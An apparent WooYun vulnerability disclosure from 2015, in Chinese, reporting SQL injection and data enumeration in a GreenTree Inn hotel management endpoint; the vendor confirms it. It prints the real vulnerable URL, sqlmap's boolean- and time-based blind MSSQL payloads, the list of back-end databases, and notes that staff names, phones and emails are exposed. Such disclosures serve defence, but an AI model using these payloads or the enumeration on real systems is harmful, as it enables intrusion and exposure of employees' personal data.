当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127316

漏洞标题:格林豪泰酒店某系统存在SQL注入漏洞

相关厂商:格林豪泰酒店管理集团

漏洞作者: 浮萍

提交时间:2015-07-19 22:55

修复时间:2015-09-04 09:32

公开时间:2015-09-04 09:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-19: 细节已通知厂商并且等待厂商处理中
2015-07-21: 厂商已经确认,细节仅向厂商公开
2015-07-31: 细节向核心白帽子及相关领域专家公开
2015-08-10: 细节向普通白帽子公开
2015-08-20: 细节向实习白帽子公开
2015-09-04: 细节向公众公开

简要描述:

SQL注入
遍历泄露信息

详细说明:

http://mis.998.com/GreenTreeInn/MIS/AddressBook_Hotel.ashx?s=021019&n=%E6%A0%BC%E6%9E%97%E8%B1%AA%E6%B3%B0%E4%B8%8A%E6%B5%B7%E9%95%BF%E9%98%B3%E8%B7%AF%E6%B1%9F%E6%B5%A6%E5%85%AC%E5%9B%AD%E5%9C%B0%E9%93%81%E7%AB%99%E5%95%86%E5%8A%A1%E9%85%92%E5%BA%97

Snap42.jpg


可以看到手机号、邮箱和姓名
访问http://mis.998.com/GreenTreeInn/MIS/AddressBook_Hotel.ashx?s=021019一样

Snap43.jpg


将参数s值换一下http://mis.998.com/GreenTreeInn/MIS/AddressBook_Hotel.ashx?s=0210
可以遍历

Snap45.jpg


然后尝试注入

GET parameter 's' is vulnerable. Do you want to keep testing the others (if any)
? [y/N] n
sqlmap identified the following injection points with a total of 59 HTTP(s) requ
ests:
---
Place: GET
Parameter: s
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: s=021%' AND 4632=4632 AND '%'='
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: s=-6630%' OR 5380=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers A
S sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysus
ers AS sys7) AND '%'='
---


web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008


数据库

available databases [15]:
[*] BPM
[*] eHR20131110
[*] eHR20140303
[*] eHR20141029
[*] eHR20150705
[*] eHR_DB
[*] eHR_History
[*] FlowER_History
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ZKTime


就不跑表了

Snap47.jpg


漏洞证明:

http://mis.998.com/GreenTreeInn/MIS/AddressBook_Hotel.ashx?s=021019&n=%E6%A0%BC%E6%9E%97%E8%B1%AA%E6%B3%B0%E4%B8%8A%E6%B5%B7%E9%95%BF%E9%98%B3%E8%B7%AF%E6%B1%9F%E6%B5%A6%E5%85%AC%E5%9B%AD%E5%9C%B0%E9%93%81%E7%AB%99%E5%95%86%E5%8A%A1%E9%85%92%E5%BA%97

Snap42.jpg


可以看到手机号、邮箱和姓名
访问http://mis.998.com/GreenTreeInn/MIS/AddressBook_Hotel.ashx?s=021019一样

Snap43.jpg


将参数s值换一下http://mis.998.com/GreenTreeInn/MIS/AddressBook_Hotel.ashx?s=0210
可以遍历

Snap45.jpg


然后尝试注入

GET parameter 's' is vulnerable. Do you want to keep testing the others (if any)
? [y/N] n
sqlmap identified the following injection points with a total of 59 HTTP(s) requ
ests:
---
Place: GET
Parameter: s
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: s=021%' AND 4632=4632 AND '%'='
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: s=-6630%' OR 5380=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers A
S sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysus
ers AS sys7) AND '%'='
---


web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008


数据库

available databases [15]:
[*] BPM
[*] eHR20131110
[*] eHR20140303
[*] eHR20141029
[*] eHR20150705
[*] eHR_DB
[*] eHR_History
[*] FlowER_History
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ZKTime


就不跑表了

Snap47.jpg


修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-07-21 09:30

厂商回复:

感谢对格林的关注,已进行处理。。。

最新状态:

暂无